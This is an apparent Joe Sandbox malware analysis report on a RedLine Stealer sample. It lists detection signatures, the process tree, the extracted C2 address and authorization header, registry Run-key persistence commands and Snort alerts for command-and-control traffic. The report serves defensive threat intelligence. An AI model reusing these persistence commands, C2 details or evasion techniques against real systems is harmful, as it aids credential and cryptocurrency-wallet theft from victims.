Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SysrI6zSkJ.exe

Overview

General Information

Sample name:SysrI6zSkJ.exe
renamed because original name is a hash value
Original sample name:2e501240ec8b9aab46d76a6504e44882.exe
Analysis ID:1402122
MD5:2e501240ec8b9aab46d76a6504e44882
SHA1:1a97d7662e66502faa5a7718565bb362eb6f27bd
SHA256:582cf0470ba0d2c2ef2c3fee83442db0e345656f7d7c46ee5b613998fdd6ee00
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected EXE embedded in BAT file
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SysrI6zSkJ.exe (PID: 6472 cmdline: C:\Users\user\Desktop\SysrI6zSkJ.exe MD5: 2E501240EC8B9AAB46D76A6504E44882)
    • reg.exe (PID: 6596 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6620 cmdline: cmd.exe /c C:\ProgramData\WinNet\embedded.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • embedded.exe (PID: 6904 cmdline: C:\ProgramData\WinNet\embedded.exe MD5: DB408CB75C1D0DA769C19A6CBBE60D87)
        • reg.exe (PID: 7068 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6940 cmdline: cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • AnyDesk.exe (PID: 6256 cmdline: C:\ProgramData\WinNet\AnyDesk.exe MD5: A21768190F3B9FEAE33AAEF660CB7A83)
            • AnyDesk.exe (PID: 5768 cmdline: "C:\ProgramData\WinNet\AnyDesk.exe" --local-service MD5: A21768190F3B9FEAE33AAEF660CB7A83)
            • AnyDesk.exe (PID: 7072 cmdline: "C:\ProgramData\WinNet\AnyDesk.exe" --local-control MD5: A21768190F3B9FEAE33AAEF660CB7A83)
        • cmd.exe (PID: 2504 cmdline: cmd.exe /c C:\ProgramData\WinNet\p.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 7076 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • gg.exe (PID: 2228 cmdline: "C:\ProgramData\WinNet\gg.exe" MD5: 20AB063F206EB8115FDE1479E05C245E)
    • cmd.exe (PID: 6664 cmdline: cmd.exe /c C:\ProgramData\WinNet\p.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7016 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • gg.exe (PID: 6160 cmdline: "C:\ProgramData\WinNet\gg.exe" MD5: 20AB063F206EB8115FDE1479E05C245E)
  • rundll32.exe (PID: 7292 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • gg.exe (PID: 7632 cmdline: "C:\ProgramData\WinNet\gg.exe" MD5: 20AB063F206EB8115FDE1479E05C245E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "67.203.7.148:2909", "Authorization Header": "1c494bfb642e6b40ce5b6d4207377297"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SysrI6zSkJ.exeJoeSecurity_EXEembeddedinBATfileYara detected EXE embedded in BAT fileJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\WinNet\gg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          C:\ProgramData\WinNet\embedded.exeJoeSecurity_EXEembeddedinBATfileYara detected EXE embedded in BAT fileJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 12 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        7.2.embedded.exe.1a0bad00098.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          0.2.SysrI6zSkJ.exe.231d8f00098.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            7.2.embedded.exe.1a0bad00098.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                              14.0.gg.exe.7a0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c C:\ProgramData\WinNet\p.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6664, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , ProcessId: 7016, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\WinNet\gg.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Repository
                                Sigma detected: Direct Autorun Keys Modification
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentImage: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentProcessId: 6472, ParentProcessName: SysrI6zSkJ.exe, ProcessCommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, ProcessId: 6596, ProcessName: reg.exe
                                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentImage: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentProcessId: 6472, ParentProcessName: SysrI6zSkJ.exe, ProcessCommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, ProcessId: 6596, ProcessName: reg.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c C:\ProgramData\WinNet\p.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6664, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , ProcessId: 7016, ProcessName: wscript.exe

                                Snort Signatures

                                Timestamp:03/03/24-13:32:21.412111
                                SID:2046056
                                Source Port:2909
                                Destination Port:49738
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:12.962499
                                SID:2043231
                                Source Port:49730
                                Destination Port:2909
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:05.128395
                                SID:2046056
                                Source Port:2909
                                Destination Port:49729
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:05.256436
                                SID:2046056
                                Source Port:2909
                                Destination Port:49730
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:31:59.867235
                                SID:2046045
                                Source Port:49730
                                Destination Port:2909
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:31:59.719964
                                SID:2046045
                                Source Port:49729
                                Destination Port:2909
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:31:59.883479
                                SID:2043234
                                Source Port:2909
                                Destination Port:49729
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:00.028789
                                SID:2043234
                                Source Port:2909
                                Destination Port:49730
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:16.020247
                                SID:2046045
                                Source Port:49738
                                Destination Port:2909
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:16.182547
                                SID:2043234
                                Source Port:2909
                                Destination Port:49738
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:10.977333
                                SID:2043231
                                Source Port:49729
                                Destination Port:2909
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/03/24-13:32:26.512386
                                SID:2043231
                                Source Port:49738
                                Destination Port:2909
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Found malware configuration
                                Source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": "67.203.7.148:2909", "Authorization Header": "1c494bfb642e6b40ce5b6d4207377297"}
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\WinNet\embedded.exeReversingLabs: Detection: 58%
                                Source: C:\ProgramData\WinNet\gg.exeReversingLabs: Detection: 71%
                                Multi AV Scanner detection for submitted file
                                Source: SysrI6zSkJ.exeReversingLabs: Detection: 39%
                                Source: unknownHTTPS traffic detected: 185.229.191.44:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 64.31.23.26:443 -> 192.168.2.4:49733 version: TLS 1.2
                                Source: SysrI6zSkJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000030E2000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdb source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_app\win_app.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: SAS.pdbR source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_loader\AnyDesk.pdb source: AnyDesk.exe, 00000010.00000002.2886245081.0000000001473000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdbd source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 0654899Bh18_2_06548768
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 06549C67h18_2_06549508
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 06549465h18_2_065491A0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 0654D020h18_2_0654CB28
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then inc dword ptr [ebp-20h]18_2_06542681
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then inc dword ptr [ebp-20h]18_2_065423B0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 063F89A3h24_2_063F8770
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 063FF864h24_2_063FF597
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 063FB107h24_2_063FA99B
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then inc dword ptr [ebp-20h]24_2_063F2680
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then inc dword ptr [ebp-20h]24_2_063F23B0
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 4x nop then jmp 063FD121h24_2_063FD109

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49729 -> 67.203.7.148:2909
                                Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49729 -> 67.203.7.148:2909
                                Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49730 -> 67.203.7.148:2909
                                Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49730 -> 67.203.7.148:2909
                                Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 67.203.7.148:2909 -> 192.168.2.4:49729
                                Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 67.203.7.148:2909 -> 192.168.2.4:49730
                                Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 67.203.7.148:2909 -> 192.168.2.4:49729
                                Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 67.203.7.148:2909 -> 192.168.2.4:49730
                                Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49738 -> 67.203.7.148:2909
                                Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49738 -> 67.203.7.148:2909
                                Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 67.203.7.148:2909 -> 192.168.2.4:49738
                                Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 67.203.7.148:2909 -> 192.168.2.4:49738
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: 67.203.7.148:2909
                                Source: global trafficTCP traffic: 192.168.2.4:49729 -> 67.203.7.148:2909
                                Source: Joe Sandbox ViewIP Address: 185.229.191.44 185.229.191.44
                                Source: Joe Sandbox ViewASN Name: AS-COLOAMUS AS-COLOAMUS
                                Source: Joe Sandbox ViewJA3 fingerprint: c91bde19008eefabce276152ccd51457
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownTCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknownDNS traffic detected: queries for: boot.net.anydesk.com
                                Source: unknownHTTP traffic detected: POST /httpapi HTTP/1.1Host: api.playanext.comUser-Agent: AnyDesk/8.0.8Accept: */*Content-Length: 352Content-Type: application/x-www-form-urlencodedapi_key=c1426bd258099fa69f62933b466d4b77&event=[{"event_type":"check_offer","user_id":"f9be650e732b28999541a3d29be8e5d3","session_id":1709469125922881,"ip":"$remote","event_properties":{"method_used":"Google Chrome Criteria Checker","offer_product":"Google Chrome","distributor":"AnyDesk","distributor_product":"AnyDesk","user_country":"Switzerland"}}Data Raw: Data Ascii:
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
